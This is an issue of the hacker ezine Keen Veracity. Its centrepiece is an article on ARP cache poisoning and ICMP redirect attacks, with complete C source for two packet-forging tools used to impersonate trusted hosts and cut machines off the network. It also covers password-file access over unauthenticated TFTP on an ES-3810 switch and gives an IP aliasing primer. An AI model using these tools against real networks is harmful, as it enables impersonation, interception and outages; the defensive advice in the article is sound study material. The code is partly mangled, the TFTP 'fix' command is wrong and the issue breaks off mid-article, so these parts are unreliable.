----------------------------------------------------------------------------- K E E N V E R A C I T Y L E G I O N S O F T H E U N D E R G R O U N D I S S U E # [7] ----------------------------------------------------------------------------- --[CONTENTS]-- (1/8)--[Introduction]---------------------------------------[Digital Ebola] (2/8)--[Redir games with ARP and ICMP]-------------------------------[yuri] (3/8)--[FUN WITH THE ES-3810 AN ATM REALITY]--------------------[optiklenz] (4/8)--[Ip Aliasing]-----------------------------------------------[guidob] (5/8)--[Yet Another Newbies Guide to Linux Security]--------[Digital Ebola] (6/8)--[UBE98 -- Unbreakable Encryption]----------------------[Joe Peschel] (7/8)--[Windows 95 Protection]-------------------------------------[NtWak0] --------------------------------------------------------------------------- [Introduction] [Digital Ebola] --------------------------------------------------------------------------- It's here. Better late then never. Keen Veracity 7 is out in full force for your reading pleasure. It seems that recent events are going to fuel this issue's editorial. The point that I wish to get across is not a kind one. The electronic skills you wield for work and play now are showing their full capabilities. YOU are now a weapon. In a alternate universe, a planet wages war, not with ships, jets, or missiles, but with information and computers. Countries are now invading each other via electronic boundaries. IT departments are now platoons. No country's data is safe. Sound far fetched? Is that really an alternate universe or the one in which we now live? You be the judge. Its a future that no one wishes to think of, or realise. No matter how much we protest, it will come down to it. And this is not a new idea. People have been toying around the idea for years. The digital age is bringing this concept to life, and there is nothing to stop it. Goverments will try to regulate the people, to show they are making an effort, and to cover up their own tracks. For it is not the citizens of the world that will make this happen, but the goverments themselves. They are taking a hackers concept, and turning it against the world not for the people, but for their gains. The media will help them, because it will fuel their coffers as well. I'm sure that certain "sources in cyberspace" will be glad to toss fuel on the fire and hype it all up. So, now, I ask of you, readers and associates in the field, to think things through before you take that next server. It's coming down to a matter of ethics. And it looks like we, as researchers in the field, are the only ones that care. --------------------------------------------------------------------------- [ Playing redir games with ARP and ICMP] [yuri volobuev] --------------------------------------------------------------------------- [ -Intro- ] There're bugs and there're features. All too often the distinction between the two is in the eye of the beholder. I'd like to show how two legitimate protocols, ARP and ICMP, while properly implemented, can be used to achieve something which is, well, not desirable. While passive attacks (sniffing) that take advantage of the root access to LAN are extremely popular and every half-way decent root kit has some kind of a net sniffer, active attacks are not nearly as widespread. Yet, active participation in the life of your LAN may bring lots of fun and joy. You knew that already, it's just that technical details had been somewhat obscure. So, let there be more light. Possibilities outlined here include spoofing and DoS. While other means of spoofing, such as IP blind spoofing, are more general and powerful, in terms of who can use them, they require quite a lot of (guess)work and may be hard to implement. ARP spoofing, on contrary, is very easy and robust. While ARP spoofing is only possible on a local network, it may be a serious concern as a way to extend an already existing security breach. If somebody can break into one machine on a subnet, ARP spoofing can be used to compromise the rest of it. [ -Background on ARP- ] [well, originally i wrote few paragraphs outlining arp, but then i figured that if you didn't know how it works already, you'll need to learn it from a better source. I recommend "TCP/IP Illustrated" by W.Richard Stevens.] [ -What can be done- ] Let's consider a hypothetical network IP hostname cat rat dog bat hw addr AA:AA BB:BB CC:CC DD:DD (for short) all connected by Ethernet in some simple way (i.e. no switches, no smart hubs). You're on cat, you have root and desire to break into dog. You know that dog trusts rat, so if you can successfully spoof rat, something can be gained. First thing that comes to mind (I think everybody was thinking about this at some point) is "why don't I set my IP to the IP of that other machine and..." That won't work, at least it won't work reliably. If you tell Ethernet driver on cat that it's IP is, it'll start answering ARP requests to that IP. But so will rat. It's a pure race condition, and there's no winner. However, you can easily be the loser, because this particular situation happens quite often when some box is misconfigured to use somebody's else's IP, so many implmentations immedeately notice that and loudly complain. Many network traffic analyzers flag that, too. Seeing a syslog message saying something nasty (mentioning cat's Ethernet address) on the LAN admin's console is not quite what you want. And what you want you won't necessarily get, that is getting anything remotely close to a working connection. This of course can be helped. The attached program, send_arp.c, can be a useful tool. Just as its name says, it sends an ARP packet [ARP reply, to be exact: since the protocol is stateless, reply will be happily accepted even if no one ever asked for it. Request would do just as well, though, because of the ARP caching logic] to the net, and you can make this packet to be what you want. What you want is an ability to specify source and target IP and hardware addresses. First, you don't want your Ethernet driver to talk too much, and it's easy to accomplish with ifconfig -arp. Of course, it'll need ARP info anyway, so you'll have to feed it to the kernel manually with arp(8). The critical part is convincing your neighbours. In the case being described here, you want dog to believe that rat's hardware address is that of cat (AA:AA), so you send ARP reply with source IP, source hw address AA:AA, target IP address and target hardware address CC:CC. Now, for all dog knows, rat is at AA:AA. Cache entry would expire, of course, so it needs to be updated (request needs to be resent). How often depends on the particular system, but every 40 sec or so should be sufficient for most cases. Send it more often if you want, it won't hurt. A complication here could come from an ARP caching implementation feature. Some systems (e.g. Linux) would try to update their cache entries by sending a unicast ARP request to the cached address (like your wife calling you just to make sure you're there). Such a request can screw things up, because it could change victim's ARP entry that we just faked, so it must be prevented. This can be accomplished by feeding the "wife" system with replies so that it never has to ask for it. Prevention is the best cure, as always. This time, a real packet from dog to rat should be sent, it's just that cat will be sending it, not dog, but for rat there's no way to tell. Again, doing it about every 40 sec is usually OK. So the procedure is simple. Bring up an alias interface, e.g. eth0:1 (or use your current one, whatever), with rat's IP and ARP on -- you need to set up some cache entries first, and it won't work on non-arp interface. Set up a host route entry for dog through the right interface. Set up a cache entry for dog, turn off arp, and it's all set. Now, inject the venom with send_arp (hitting both dog and rat) and for all dog knows, you're on rat. Just remember to keep sending those ARP packets to dog and rat. This attack only works on the local network, of course (in general, it can reach as far as ARP packets can get, usually not too far because ARP packets are almost never routed). But an interesting extension here is taking this outside by replacing dog's hardware address in the above plan with the router's. If it works (I'm not sure it always will, router's ARP implementation may be tougher to fool, and since I don't want to try it on real routers, I don't know, but there's no simple reason why not) you can easily impersonate any machine on the local network to the rest of the world. So the target machine could really be anywhere, but the machine you're impersonating must be on the same LAN. [ -What else can be done- ] Aside from spoofing, there's range of other things you can do with ARP. The sky is really the limit here. DoS is the most obvious application. Feeding victim wrong hardware address is a powerful way to make it mute. You can prevent it from talking to any particular machine (and ARP cache size usually allows for the whole network to fit in, so effectively you can stop it from talking to everybody for some time). Obvious target would be the router. Cache poisoning again should be two-way: both the victim system and the system you don't want victim to talk to should be fed. The simplest case would be feeding a non-existant address. It's not the most efficient, though, as the system will quickly realize that it's talking to nobody and send out an ARP request. Of course, your next drop of poison will nullify this, but you have to do it quite often. A more efficient approach here is feeding the victim with the hardware address of the wrong machine, which itself is alive and well. Again, it depends on a particular situation, but very often what happens is that victim keeps sending out packets of various types that arrive to the wrong destination, and destination system will promptly send ICMP Xxx Unreachable messages back, thus emulating a connection in some perverted way. This pseudo-conection can easily postpone cache expiry. On Linux, for example, pseudo-connection raises cache expiry from usual 1 min to about 10 min. By that time, most or all TCP connections are screw up. Could be quite annoying. This way, one ARP packet can screw someone. An interesting twist here is so-called "gratuitous ARP". It's when the source and target IPs in the ARP request are the same, and it usually appears in a form of an Ethernet broadcast. Some implementations recognize it as a special case, that of a system sending out updated information about itself to everybody, and cache that request. This way one packet could screw up the entire network. It must be admitted, though, that gratuitous ARP is not really defined as a part of ARP, so it's up to vendor to (not) implement it, and it's becoming increasingly less popular. ARP is a serious tool for professional practical jokes, too. Just imagine somebody setting up a relay, or tunnel, in a form of own machine that convinced two neighbours to send their packets intended for each other to relay's Ethernet. If relay just forwards packets to their real destinations, no one would even notice. However, some simple data stream modifications could have quite a spectacular effect on one's mental health. A simple, CPU-inexpensive "filter" could be swapping random two bytes at irregular long intervals. If it hits the data portion, most of the checksums won't change, i.e. data stream would seem to be intact, yet strange and unexplicable things _will_ happen for no apparent reason. [ -ICMP redirects- ] An effect somewhat similar to ARP cache poisoning can be achieved in a different way, again using a legitimate protocol feature, ICMP route redirects. Such a redirect is normally sent by the default router to the system to indicate that there's a shorter route to some particular destination. Originally, both network and host route redirects were proposed, but later net redirects were deprecated and now are usually treated as host redirects. Properly constructed ICMP packet that passes all sanity checks (it must come from the default router for the destination it's redirecting, new router should be on a directly connected network, etc.) it causes a host-route entry be added to the system routing table. The concept is just as secure as ICMP itself, i.e. (security)NULL. Spoofing routers IP address is simple, and attached icmp_redir.c does just that. Host Requirements RFC states that system MUST follow ICMP redirects unless it's a router. And indeed all the systems I've tried happily accept it (except vanilla Linux 2.0.30, where it's broken, it works in 2.0.29 and 2.0.31pre9, according to Alan Cox). ICMP redirects present a rather potent DoS. Unlike ARP cache entries, those host routes won't expire with time. And of course no access to local network is required, attack can be launched from anywhere. So if the target system does accept ICMP redirects (and packets can actually reach it) that system can be stopped from talking to any particular address on the net (well, not all, but those that aren't on the same subnet with the target). Nameservers would be an obvious target. [ -What can be done about it- ] ARP is low level protocol and as such is usually hidden from normal people. LAN admins may be concerned with it at times, but if all goes well no one pays attention. One can always inspect contents of ARP cache using arp(8), especially if there's some misterious network problem, but again it's not the first thing that comes to mind. Even W95 has arp command, and remembering about it may be helpful in certain situations. However, if you're the target of the attack originating from another network via gateway arp spoofing, there's no way to tell. Similarly, host routing table could be examined to spot ICMP-generated entries (in most versions of route(1) they are marked with D letter in flags field). Just be aware. The above ARP attack scheme work perfectly for plain old 10Base2 Ethernet. However, if machines are interconnected in some more advanced way, particularly using some smart hubs or switches, attack can be more visible or even impossible (same goes for passive attacks). So there's yet another reason to invest in a good piece of network equipment. A good deal of peace of mind may just come with it. In general, however, I personally find it rather sad that things like ICMP redirects were made a default. First, it's often not necessary because many networks have very simple structure and there's never a need for anything in addition to usual routing table. Second, on more sophisticated networks routing table can be just as well set manually, it's not really such a dynamic thing, so why do it via ICMP? And finally, it's dangerous, so I would like to disable it on my systems, even though it'll make them less compliant with RFC1122. Alas, it may not be easy. On Linux or any other OS with sources available, I can at least hack the kernel and #define it out. On Irix 6.2 and possibly other versions one can set icmp_dropredirects=1 with systune (I'm genuinely surprised to see it there, I really am). Other OSes can be configurable, too, I have no information. With ARP, we basically face a situation when the problem of name resolution is solved dynamically without a centralized server. It doesn't have to be this way. When one wants to map hostname to an IP, nameserver is queried or /etc/hosts is consulted, i.e. there's some static mapping established. I don't see why a similar thing can't be done with ARP. Ethernet hardware addresses don't change too often, and when they do change, it won't kill net admin to change the corresponding map. Ethernet can be forced in no-arp mode, you just need to make sure your ARP cache has all the entries made as permanent. As a bonus, this will reduce network traffic somewhat. Standard procedures can be used to distribute ARP map, e.g. rdist, rsync (I would say NIS, but if you use NIS, ARP is probably not your top security concern anyway). Old tradition of /etc/ethers can be brought back to life. But getting a kick-ass Ethernet switch still looks better to me (paying for it does not, though). And old wisdom still shine bright though time: don't use hostname-only based auth. Those who do shall have no mercy from net gods. cheers, yuri P.S. On Firewalls I anticipate that many of you, having read the section about ICMP, are already flexing the fingers preparing to write a follow-up explaining that all those ICMP packets can be filtered out on the firewall, thus it's not a problem. Please don't. I'm well aware of the concept. An if you feel you absolutely have to, don't cc the list needlessly. I have to note that many people use "i have firewall, and I like it, therefore everyone else should get one or get lost" logic to argue that certain security problems are less serious because they can be effectively eliminated by putting a firewall between the protected network and Internet. While I fully agree that having firewall is very good for security, I want to note that it's not always possible or effective. Imagine an environment where all machines are directly connected to Internet, you have to share subnet with people you don't know who have vanilla SGI boxes screaming "hack me pleeeease, my vendor did such a great job of making it eeeeeeasy" all over the place (and sure, these people know Unix, they've seen it in Jurassic Park... and that would be about it), and the router to your subnet is controlled by a separate organization. Welcome to a standard academic environment, where people don't use firewalls. In fact, in some of those environments one would be useful to protect the outside world from the people on the inside. Still, people work there, and use computers, too. And that's where per-host security solutions are necessary, it's a jungle where every host is for itself. So please, next time you think "firewall", remember, it's not for everyone. CUT HERE /* send_arp.c This program sends out one ARP packet with source/target IP and Ethernet hardware addresses suuplied by the user. It compiles and works on Linux and will probably work on any Unix that has SOCK_PACKET. The idea behind this program is a proof of a concept, nothing more. It comes as is, no warranty. However, you're allowed to use it under one condition: you must use your brain simultaneously. If this condition is not met, you shall forget about this program and go RTFM immediately. yuri volobuev'97 volobuev@t1.chem.umn.edu */ #include #include #include #include #include #include #include #include #include #include #define ETH_HW_ADDR_LEN 6 #define IP_ADDR_LEN 4 #define ARP_FRAME_TYPE 0x0806 #define ETHER_HW_TYPE 1 #define IP_PROTO_TYPE 0x0800 #define OP_ARP_REQUEST 2 #define DEFAULT_DEVICE "eth0" char usage[]={"send_arp: sends out custom ARP packet. yuri volobuev'97\n\ \tusage: send_arp src_ip_addr src_hw_addr targ_ip_addr tar_hw_addr\n\n"}; struct arp_packet { u_char targ_hw_addr[ETH_HW_ADDR_LEN]; u_char src_hw_addr[ETH_HW_ADDR_LEN]; u_short frame_type; u_short hw_type; u_short prot_type; u_char hw_addr_size; u_char prot_addr_size; u_short op; u_char sndr_hw_addr[ETH_HW_ADDR_LEN]; u_char sndr_ip_addr[IP_ADDR_LEN]; u_char rcpt_hw_addr[ETH_HW_ADDR_LEN]; u_char rcpt_ip_addr[IP_ADDR_LEN]; u_char padding[18]; }; void die(char *); void get_ip_addr(struct in_addr*,char*); void get_hw_addr(char*,char*); int main(int argc,char** argv){ struct in_addr src_in_addr,targ_in_addr; struct arp_packet pkt; struct sockaddr sa; int sock; if(argc != 5)die(usage); sock=socket(AF_INET,SOCK_PACKET,htons(ETH_P_RARP)); if(sock<0){ perror("socket"); exit(1); } pkt.frame_type = htons(ARP_FRAME_TYPE); pkt.hw_type = htons(ETHER_HW_TYPE); pkt.prot_type = htons(IP_PROTO_TYPE); pkt.hw_addr_size = ETH_HW_ADDR_LEN; pkt.prot_addr_size = IP_ADDR_LEN; pkt.op=htons(OP_ARP_REQUEST); get_hw_addr(pkt.targ_hw_addr,argv[4]); get_hw_addr(pkt.rcpt_hw_addr,argv[4]); get_hw_addr(pkt.src_hw_addr,argv[2]); get_hw_addr(pkt.sndr_hw_addr,argv[2]); get_ip_addr(&src_in_addr,argv[1]); get_ip_addr(&targ_in_addr,argv[3]); memcpy(pkt.sndr_ip_addr,&src_in_addr,IP_ADDR_LEN); memcpy(pkt.rcpt_ip_addr,&targ_in_addr,IP_ADDR_LEN); bzero(pkt.padding,18); strcpy(sa.sa_data,DEFAULT_DEVICE); if(sendto(sock,&pkt,sizeof(pkt),0,&sa,sizeof(sa)) < 0){ perror("sendto"); exit(1); } exit(0); } void die(char* str){ fprintf(stderr,"%s\n",str); exit(1); } void get_ip_addr(struct in_addr* in_addr,char* str){ struct hostent *hostp; in_addr->s_addr=inet_addr(str); if(in_addr->s_addr == -1){ if( (hostp = gethostbyname(str))) bcopy(hostp->h_addr,in_addr,hostp->h_length); else { fprintf(stderr,"send_arp: unknown host %s\n",str); exit(1); } } } void get_hw_addr(char* buf,char* str){ int i; char c,val; for(i=0;i= 'a' && c <= 'f') val = c-'a'+10; else die("Invalid hardware address"); *buf = val << 4; if( !(c = tolower(*str++))) die("Invalid hardware address"); if(isdigit(c)) val = c-'0'; else if(c >= 'a' && c <= 'f') val = c-'a'+10; else die("Invalid hardware address"); *buf++ |= val; if(*str == ':')str++; } } CUT HERE /* icmp_redir.c This program sends out an ICMP host redirect packet with gateway IP supplied by user. It was written and tested under Linux 2.0.30 and could be rather easily modified to work on most Unices. The idea behind this program is a proof of a concept, nothing more. It comes as is, no warranty. However, you're allowed to use it under one condition: you must use your brain simultaneously. If this condition is not met, you shall forget about this program and go RTFM immediately. yuri volobuev'97 volobuev@t1.chem.umn.edu */ #include #include #include #include #include #include #include #include #include #include #include #include #define IPVERSION 4 struct raw_pkt { struct iphdr ip; /* This is Linux-style iphdr. Use BSD-style struct ip if you want */ struct icmphdr icmp; struct iphdr encl_iphdr; char encl_ip_data[8]; }; struct raw_pkt* pkt; void die(char *); unsigned long int get_ip_addr(char*); unsigned short checksum(unsigned short*,char); int main(int argc,char** argv){ struct sockaddr_in sa; int sock,packet_len; char usage[]={"icmp_redir: send out custom ICMP host redirect packet. \ yuri volobuev'97\n\ usage: icmp_redir gw_host targ_host dst_host dummy_host\n"}; char on = 1; if(argc != 5)die(usage); if( (sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){ perror("socket"); exit(1); } sa.sin_addr.s_addr = get_ip_addr(argv[2]); sa.sin_family = AF_INET; packet_len = sizeof(struct raw_pkt); pkt = calloc((size_t)1,(size_t)packet_len); pkt->ip.version = IPVERSION; pkt->ip.ihl = sizeof(struct iphdr) >> 2; pkt->ip.tos = 0; pkt->ip.tot_len = htons(packet_len); pkt->ip.id = htons(getpid() & 0xFFFF); pkt->ip.frag_off = 0; pkt->ip.ttl = 0x40; pkt->ip.protocol = IPPROTO_ICMP; pkt->ip.check = 0; pkt->ip.saddr = get_ip_addr(argv[1]); pkt->ip.daddr = sa.sin_addr.s_addr; pkt->ip.check = checksum((unsigned short*)pkt,sizeof(struct iphdr)); pkt->icmp.type = ICMP_REDIRECT; pkt->icmp.code = ICMP_REDIR_HOST; pkt->icmp.checksum = 0; pkt->icmp.un.gateway = get_ip_addr(argv[4]); memcpy(&(pkt->encl_iphdr),pkt,sizeof(struct iphdr)); pkt->encl_iphdr.protocol = IPPROTO_IP; pkt->encl_iphdr.saddr = get_ip_addr(argv[2]); pkt->encl_iphdr.daddr = get_ip_addr(argv[3]); pkt->encl_iphdr.check = 0; pkt->encl_iphdr.check = checksum((unsigned short*)&(pkt->encl_iphdr), sizeof(struct iphdr)); pkt->icmp.checksum = checksum((unsigned short*)&(pkt->icmp), sizeof(struct raw_pkt)-sizeof(struct iphdr)); if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0) { perror("setsockopt: IP_HDRINCL"); exit(1); } if(sendto(sock,pkt,packet_len,0,(struct sockaddr*)&sa,sizeof(sa)) < 0){ perror("sendto"); exit(1); } exit(0); } void die(char* str){ fprintf(stderr,"%s\n",str); exit(1); } unsigned long int get_ip_addr(char* str){ struct hostent *hostp; unsigned long int addr; if( (addr = inet_addr(str)) == -1){ if( (hostp = gethostbyname(str))) return *(unsigned long int*)(hostp->h_addr); else { fprintf(stderr,"unknown host %s\n",str); exit(1); } } return addr; } unsigned short checksum(unsigned short* addr,char len){ register long sum = 0; while(len > 1){ sum += *addr++; len -= 2; } if(len > 0) sum += *addr; while (sum>>16) sum = (sum & 0xffff) + (sum >> 16); return ~sum; } --------------------------------------------------------------------------- [FUN WITH THE ES-3810 AN ATM REALITY] [optiklenz] --------------------------------------------------------------------------- NAME: Steve Stakton a.k.a. AFFILIATION: LOU- Legions Of the Underground GOAL: TO KNOW BOTH WHAT EVERYONE ELSE KNOWS, AND DOESN'T KNOW AGE: CAN YOU COUNT TO 24? HEIGHT: WHY DONT I JUST DRAW YOU A FULL SKETCH COMPOSITE FOR YOUR WANTED POSTERS? WHERE: ON THE ROAD DESTINATION: YET TO BE DECIDED INTEREST: PHONE SYSTEMS (WHO DOESN'T USE THE TERM COSMOS ON A DAY TO DAY BASIS), NETWORKS, ELECTRONICS, BEER, RIGGING THE LOCAL NMS TO BREED WITH THE NEIGHBORS PDN. SOUTH PARK, AND GIRLS WITH SLIGHT FACIAL HAIR TURN-OFFS: PEOPLE WHO THINK THEY KNOW THINGS THEY DONT, AND GIRLS WITH TO MUCH FACIAL HAIR. HANGOUTS: VENICE BEACH, Narkotik Illusions, The Abyss & the Electronic Source BBS MUSIC GROUPs: Pink Floyd, and ICP, Rolling Stones (NO SECURITY!) WEB: http://www.legions.org, http://www.t00ned.org/optik/ OS OF CHOICE: *BSD OS'S THAT SUCK: CALDERA, MACOS, AND THAT ONE OS MADE BY THAT BILL GUY. "Get out and ride on, baby, ride on, baby Ride on, baby, ride on, baby I could pick your face out in an FBI file You may look pretty but I can't say the same for your mind" -Rolling Stones On with the show... First off there are some definitions, and Acronyms to be familiar with. AMI (ATM Management Interface) - The user interface to switching control software. AMI lets you monitor and change various operating configurations of switches and network module hardware and software, IP connectivity, and SNMP network management Bandwidth- usually identifies the capacity of data that can be sent through a given circuit; may be user-specified in a PVC. CBR (Constant Bit Rate)- A type of traffic that requires a continuous, specific amount of bandwidth over the ATM network (e.g., digital information such as video and digitized voice) ANSI (American National Standards Institute)- A private organization that coordinates the setting and approval of some U.S standards. It also represents the U.S ISO BIP (Bit Interleaved Parity)- An error detection technique in which character bit patterns are forced into parity, so that the total number of one bits is always odd or even. DSR (Data Set Ready)- an RS-232 modem interface control signal (sent from the modem to the DTE on pin 6) which indicates that the modem is connected to the telephone circuit. DTE (Data Terminal Equipment)- generally user devices, such as terminals and computers that connect to data circuit terminating equipment. They either generate or capture data sent by the network ATDM (Asynchronous Time Division Multiplexing)- A method of sending information that resembles normal TDM, except that time slots are allocated as needed rather than prearranged to specific transmitters. EM- The CellPath 300 extension module; paired with the system controller and supporting an optional PCMCIA card. FDDI (Fiber distributed Data Interface)- High-speed data network that uses fiber-optic as the physical medium EPROM- Erasable Programmable Read Only Memory. CLP (Cell Loss Priority)- the last bit of byte four in an ATM cell header; indicates the eligibility of the cell for discard by the network under congested conditions. [Introductory to the Management Station ------------------* The ES-3810 is a switching architecture; it provides one with the ability to work with multiple switched Ethernet ports along with high performance ATM server and backbone connections to work with powerful network managing. The management console for the ES-3810 uses a menu based interface that utilizes A VT-100 terminal or VT-100 emulator like ProComm or PC Plus.The serial interface of the ES-3810 connects directly to either the DTE interface of the ASCII terminal or a serial port of the PC or workstation running terminal emulation. Note: If the NMM's SNMP-based management or IGMP support is going to be used, a console connection is required the first time the NMM is brought online since an IP address, subnet mask and possibly a gateway must be defined. [System Specs ------------------* Aggregate Throughput | 720,000 pps (packets per second) Latency | 61 ~s per 64-bp (byte packets) Filter/Forward Speed | 14,881pps Addresses/Port | 4 [workgroup]; 8,192 [segment] Buffering/Port | 256kb Media | UTP Print of settings an ES-3810 ____________________________________________________________________________ | | | ES-3810 Interface Configuration | |____________________________________________________________________________| | | | | Type: SEC-10b | Full Duplex: Disabled | | MAU: 10BaseT | Loopback: Disabled | | Number: 0 | Mode: Workgroup| |_____________________________________|______________________________________| |Media Configuration: Auto-Negotiation In Process | |____________________________________________________________________________| | | | | Link Detected: No | Forced Transmits: Disabled| | Link Polarity: Correct | VLAN Extension: n/a | | | Multicast Filtering: n/a | |_____________________________________|______________________________________| | | Transmitter: Enabled | | Receiver: Enabled | Transmit Buffer: Enabled | | Receive Buffer: Enabled | | |_____________________________________|______________________________________| | | | | Sniff Segment: Disabled | Transmit Sniffed Packets: Disabled| | Blocking: Disabled | Transmit Blocked Packets: Disabled| | Receive Errors: Disabled | Transmit Flagged Packets: Disabled| | Multicast Promiscuous: Disabled | Multicast Hash Upload: Disabled| | Individual Promiscuous: Disabled | | |_____________________________________|______________________________________| |lou%: ef cfg; do 6fde8000 | [VLAN Assignments ------------------------* VLANs are OSI Layer 2 [data link] multicast domains. VLAN membership is not necessarily tied to a physical proximity. The ES-3810 supports three criteria: MAC address based assignment to a VLAN, IP Multicast Group based assignment, and port base assignment. [MAC Address based and Port based VLANs ---------------------------------------* MAC address based VLAN assignments supersedes port based VLAN assignment. By adding an ATM module you can extend any VLAN into ATM by assigning a LEC (Lan Emulation Client) instance to the VLAN. A VLAN extended into ATM must be named with the same NAME and CASE as the ELAN for example, an ELAN called "Lab" exists and you want the station on ES-3810 port 16 to join it. On the #s-3810 you must create a VLAN called "Lab" (case sensitive) and assign port 16 to it. when asked to "configure a LEC" say yes. The ES-3810 will join (in proxy) the ELAN called "Lab" and allows the station port 16 communication rights. [IGMP Based VLANs ---------------------------------------* Some TCP/IP applications use IP multicasts to deliver data to many stations at once. How ever multicasting can cause problems because stations that are not interested in receiving multicast data to see it anyway. This causes Ethernet segment congestion and unnecessary interrupts on workstations. Filtering these multicasts via IGMP can reduce congestion and keep the network moving smoothly. IGMP is designed to add further granularity within a VLAN. If a station from two separate VLANS join the same IP multicast group; the IP multicast stream has to be sourced twice. The IP client of the ES-3810 is reachable from the first configured VLAN, independent of that VLANs name. Since, by default the first VLAN is called "default" [Routerless Network ------------------------* A routerless network is one in which the ES-3810 switches Ethernet attached host to ATM where high speed servers are found. Typically one or several of the following apply * Network has no VLAN-to-VLAN traffic requirement * Primary NOS is client/server based * Security is a MAJOR concern (trust me on this one) * Servers are on ATM for maximum performance Any network matching one or more of the above scenarios would benefit from a routerless network because clients from different VLANs can access the same server but not other VLANs [Centralized Routing Network ----------------------------* A centralized routing network is one in which the ES-3810 switches Ethernet attached host to ATM where high-speed servers and router interfaces are found. Typically the ES-3810 can be utilized in a network that meets one or more of the following criteria * Maintenance of relatively flat network * Some VLAN to VLAN connectivity * Some VLAN to VLAN packet level filtering/firewalling * Traffic is 80% local and 20% routed * Network could collapse into fewer subnets by switching to ATM [Exploiting TFTP/ES-3810 ------------------------* Issuing the command line rs :/cd usr do _filter area_ off will disable POST recognition by other users. Another thing that can be done is gaining remote access this can only happen if TFTP is binded to the system, and on the same subnet as the ES-3810 system.(which it should be by default if utilized). Since there is no password authentication you can use tftp to access the systems password file. Although you have read access to the password file other flags, and restricted privileges keep you from deleting any critical data. Logs maybe? =] ..More will be written on ES-3810 security features/insecurities when time permits. To fix this disable TFTP by issuing the following command lou% tftp dgram udp wait user /etc/tftpd tftpd -n Sources Cited: Fore Systems -optiklenz -D A T A D E S I R E S T O B E F R E E- -----BEGIN PGP PUBLIC KEY BLOCK----- mQGiBDR6E3wRBADHm2aiODOCowgDqXdcFvooCTrQe6tDPqznXChCO1p0t12hhQZe 0C+/xBorkJXlqOaDadmUQVZP3Kij97SOTWU1AS1SPSTzF6VAylHalGz9iUHjxa7g SSAVrLUMngWG7hxnz7lBHFIQ8iQPjWvK5qhEQ9vcBF9ped9StPRsZlljIwCg/02Z XXrVaJUtWAxUaAARUdPt0FsEAKyhGuQA1HgGWM/GQxpvBvmDqHkNGxM9YyrF1Dg1 PWAoNuG8GdJazj18c2AODp68NwPH0dUYTxKc4ejR//OcOfl1HRfE0thJEDpqkSyQ 2iobKGkYdmug666pe0Xr3wkgBE+rnzC3RLlUdnRAu25MuEqlc6yRWAT0YH/Pl9IB eDRGA/4uAuFiEiyfd3Djhi7Wwh8/qiG7SChW0arEXq3RqHQqd3EaVR1FgNzCtvxg kK2mY07XeSX2fjlWo4ynrBdl5QXbOn9X+GzDcw1z9FBVQHaY0EJMoE0fb53bTyCG 0bdCMTid1DUKhJeekW6cPZvRQlu5IjH/+FVT9S38UsAMMwwrCrQlU3RldmUgU3Rh a3RvbiA8b3B0aWtsZW56QGxlZ2lvbnMub3JnPokASwQQEQIACwUCNHoTfAQLAwEC AAoJEGgSVovfJxzQFfcAn0WybtLnFw9jf9agk7xUaikjEjLkAKCYfA1rx/SXP5Je v5R0+ZVMqIGiibkCDQQ0ehN8EAgA9kJXtwh/CBdyorrWqULzBej5UxE5T7bxbrlL OCDaAadWoxTpj0BV89AHxstDqZSt90xkhkn4DIO9ZekX1KHTUPj1WV/cdlJPPT2N 286Z4VeSWc39uK50T8X8dryDxUcwYc58yWb/Ffm7/ZFexwGq01uejaClcjrUGvC/ RgBYK+X0iP1YTknbzSC0neSRBzZrM2w4DUUdD3yIsxx8Wy2O9vPJI8BD8KVbGI2O u1WMuF040zT9fBdXQ6MdGGzeMyEstSr/POGxKUAYEY18hKcKctaGxAMZyAcpesqV DNmWn6vQClCbAkbTCD1mpF1Bn5x8vYlLIhkmuquiXsNV6TILOwACAgf+OCRz2nG+ SSCrgZY2nIGz68SO+2h3weFMzdBSWQDjZ5Fa7GjRBPeTRQvectPvSqcwjeZTq8DE 1AVI/oFw1mChgfV7CgQuC+P0OK+jr6tIwyhM6gdo5NEdD7/uLWJfFi2l/AP4skVv ydmg1KGlxjvtjOFKhOGoV2vSTPRGn1l1lCzBZPRur0xTtNwk5b54o8g/NlMEsO/p /P6CRP4J1WlDkH66jST+ygAYNN0AtRy0eEPUxu7+dYC4OgT0xCcglCqKf7hnMGrf s/I2MHBbhSmdtcW5pLYcEb8iwXEitGN+plAy+OZrygJ4ytFAdnL2r9NmegUPTYz0 3t4M3hiITUmiP4kAPwMFGDR6E3xoElaL3ycc0BECKBQAoKqOQNZ82RmU4rsZRM9l a6QdQeSVAJ469y3cLO1eU5oMYpLdvSGevh0mSg== =cpan -----END PGP PUBLIC KEY BLOCK----- EOF@ --------------------------------------------------------------------------- [IP Aliasing] [m0f0] --------------------------------------------------------------------------- In a LAN environment, clients and servers are connected to the network by one or more network controller cards. Each controller has a factory-set (hard-coded) primary physical address called the MAC address. The MAC address is also known as the primary unicast address. For an Ethernet controller, the MAC address is a string of hex bytes that looks, for example, like this: 08:0a:10:bc:7f:5d In addition to its own name, the controller can recognize up to 16 alias names placed in the its driver's multicast address list. The controller accepts any packet sent to its primary unicast address and any packets sent to an address in its multicast list. The IP address is a unique name given to a controller to identify it on the network. The IP address is a broken numeric string that looks similar to: Traditional internet protocol (IP) allows each controller on a network to have one IP address, which is mapped to the MAC address to establish its network identity. IP aliasing allows each controller to have a secondary IP address (an alias) supporting up to 16 unique virtual addresses, so that a network administrator can greatly expand the effective size of the network without installing additional hardware. The virtual addresses are mapped to the multicast list of the physical controller. The utilities ipalias and macconfig are used to create multiple virtual interfaces on a single physical network interface. Although the primary interface is brought on line with ifconfig, the IP layer treats the primary and secondary addresses as equals with identical responses ping, ftp, telnet, rcp, rlogin, and so forth. Aliasing the MAC Address The macconfig utility is used to add a multicast address to the list of multicast addresses on system X. This task involves the conversion of a unicast address to a new form, the multicast address. An understanding of 48-bit Universal LAN MAC address structure makes this task easier. 48-bit Universal LAN MAC Address The concept of universal addressing is based on the requirement that all members of a network have a unique identifier. Otherwise they cannot coexist. The advantage of a universal address is that a node with such an address can be attached to any LAN in the world with an assurance that its address is unique. The 48-bit Universal Address consists of two parts: 1. The first 24 bits correspond to the Organizationally Unique Identifier (OUI) as assigned by the IEEE, except that the assignee may set a control bit for group addresses (multicast addresses) or for individual addresses (unicast addresses).2. The second part, comprising the remaining 24 bits, is administered locally by the assignee. In the following 48 bit LAN MAC address, the Organizationally Unique Identifier is contained in octets 0, 1, 2 and the remaining octets 3, 4 and 5 are assigned locally. Octet 0 1 1 3 4 5 Binary 0011 0101 0111 1011 